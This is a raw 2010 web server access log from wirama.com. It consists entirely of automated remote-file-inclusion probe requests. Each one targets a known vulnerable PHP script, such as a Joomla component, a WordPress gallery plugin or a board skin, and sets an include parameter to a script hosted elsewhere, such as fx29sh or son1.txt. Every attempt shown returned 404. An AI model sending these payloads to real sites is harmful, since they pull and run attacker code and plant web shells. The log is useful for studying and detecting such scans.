75.126.213.58 - - [01/Feb/2010:06:56:22 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:57:22 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:57:22 -0800] "GET /logs/access_091201.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:57:22 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:06:59:52 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:06:59:52 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:06:59:52 -0800] "GET /logs/access_100101.log////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:06:59:54 -0800] "GET /logs/access_090801.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:06:59:54 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:06:59:55 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:07:00:01 -0800] "GET /logs/access_090801.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:07:00:01 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:07:00:01 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:00:07 -0800] "GET /logs/access_100101.log////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:00:07 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:00:07 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:00:09 -0800] "GET /logs/access_090501.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:07:01:52 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:07:01:52 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:07:01:53 -0800] "GET /logs/access_090801.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:02:06 -0800] "GET /logs/access_090801.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:02:06 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:02:12 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:02:13 -0800] "GET /logs/access_090801.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:02:13 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:02:13 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:03:29 -0800] "GET /logs/access_091101.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:03:37 -0800] "GET /logs/access_091101.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:07:06:09 -0800] "GET /logs/access_090731.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:07:06:09 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:07:06:09 -0800] "GET /logs/access_100101.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:07:06:09 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:07:06:31 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:07:06:31 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:07:06:31 -0800] "GET /logs/access_100101.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:07:06:37 -0800] "GET /logs/access_090731.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:07:07:22 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:07:07:22 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:07:07:25 -0800] "GET /logs/access_090331.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:09:14 -0800] "GET /logs/access_091101.log//skin/ggambo6200_gallery//ask_password.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:09:14 -0800] "GET /skin/ggambo6200_gallery//ask_password.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:09:14 -0800] "GET /logs//skin/ggambo6200_gallery//ask_password.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:09:42 -0800] "GET /skin/ggambo6200_gallery//ask_password.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:09:42 -0800] "GET /logs//skin/ggambo6200_gallery//ask_password.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:07:09:59 -0800] "GET /login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:10:11 -0800] "GET /logs/access_090601.log//skin/ggambo6200_gallery//ask_password.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:07:10:30 -0800] "GET /logs/access_090331.log//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:07:10:30 -0800] "GET /logs//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:07:10:37 -0800] "GET /logs/access_090401.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:07:10:43 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:07:10:43 -0800] "GET /logs/access_090331.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:07:10:43 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
86.109.170.73 - - [01/Feb/2010:07:10:43 -0800] "GET /logs/access_090731.log//main.php?appserv_root=http://www.undp.org.in/jobs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
86.109.170.73 - - [01/Feb/2010:07:10:43 -0800] "GET /logs//main.php?appserv_root=http://www.undp.org.in/jobs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
86.109.170.73 - - [01/Feb/2010:07:10:43 -0800] "GET /main.php?appserv_root=http://www.undp.org.in/jobs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
86.109.170.73 - - [01/Feb/2010:07:10:51 -0800] "GET /main.php?appserv_root=http://www.undp.org.in/jobs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
86.109.170.73 - - [01/Feb/2010:07:10:51 -0800] "GET /logs//main.php?appserv_root=http://www.undp.org.in/jobs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
86.109.170.73 - - [01/Feb/2010:07:10:51 -0800] "GET /logs/access_090731.log//main.php?appserv_root=http://www.undp.org.in/jobs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:07:11:00 -0800] "GET /login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:07:11:00 -0800] "GET /logs/access_090331.log//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:07:11:00 -0800] "GET /logs//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:11:35 -0800] "GET /logs/access_091101.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:11:35 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:11:35 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:07:13:42 -0800] "GET /logs/access_090401.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:07:14:57 -0800] "GET /logs/access_091101.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:07:14:57 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:07:14:57 -0800] "GET /logs/access_090401.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:07:14:57 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:15:41 -0800] "GET /skin/ggambo6200_gallery//ask_password.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:07:15:42 -0800] "GET /logs/access_090801.log%20%20//skin/ggambo6200_gallery//ask_password.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:07:15:42 -0800] "GET /logs//skin/ggambo6200_gallery//ask_password.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:07:19:56 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:07:19:56 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:07:19:57 -0800] "GET /logs/access_090801.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:07:19:59 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:07:19:59 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:07:19:59 -0800] "GET /logs/access_090801.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:07:20:54 -0800] "GET /logs/access_091201.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:07:20:54 -0800] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:07:20:54 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:21:26 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:21:26 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:21:28 -0800] "GET /logs/access_100101.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:07:21:30 -0800] "GET /logs/access_100101.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:23:28 -0800] "GET /include/bbs.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:23:28 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:23:28 -0800] "GET /logs/access_090501.log//include/bbs.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:23:41 -0800] "GET /logs/access_090701.log//include/bbs.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:07:24:09 -0800] "GET /logs/access_090801.log%20%20///include/bbs.lib.inc.php?site_path=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:07:24:09 -0800] "GET /logs///include/bbs.lib.inc.php?site_path=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:07:24:43 -0800] "GET /logs///include/bbs.lib.inc.php?site_path=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:07:24:43 -0800] "GET //include/bbs.lib.inc.php?site_path=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:07:24:52 -0800] "GET /logs/access_090801.log%20%20///include/bbs.lib.inc.php?site_path=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:07:25:04 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:07:25:07 -0800] "GET /logs/access_090901.log//admin/spaw/spaw_control.class.php?spaw_root=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:07:25:07 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:25:08 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:25:08 -0800] "GET /logs/access_091101.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:07:25:08 -0800] "GET //include/bbs.lib.inc.php?site_path=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:07:25:08 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:07:25:18 -0800] "GET /logs/access_090801.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:25:25 -0800] "GET /login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
58.150.99.131 - - [01/Feb/2010:07:25:25 -0800] "GET /logs//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
58.150.99.131 - - [01/Feb/2010:07:25:25 -0800] "GET /logs/access.log%20%20//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:07:25:54 -0800] "GET /logs/access_100101.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:07:25:54 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:07:25:57 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:07:26:01 -0800] "GET /login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
58.150.99.131 - - [01/Feb/2010:07:26:01 -0800] "GET /logs//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
58.150.99.131 - - [01/Feb/2010:07:26:01 -0800] "GET /logs/access.log%20%20//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:07:26:17 -0800] "GET /logs///include/bbs.lib.inc.php?site_path=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:07:26:17 -0800] "GET /logs/access_090801.log%20%20///include/bbs.lib.inc.php?site_path=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:07:26:36 -0800] "GET /logs///include/bbs.lib.inc.php?site_path=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:07:26:36 -0800] "GET /logs/access_090801.log%20%20///include/bbs.lib.inc.php?site_path=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:07:26:36 -0800] "GET //include/bbs.lib.inc.php?site_path=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:07:27:17 -0800] "GET //include/bbs.lib.inc.php?site_path=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
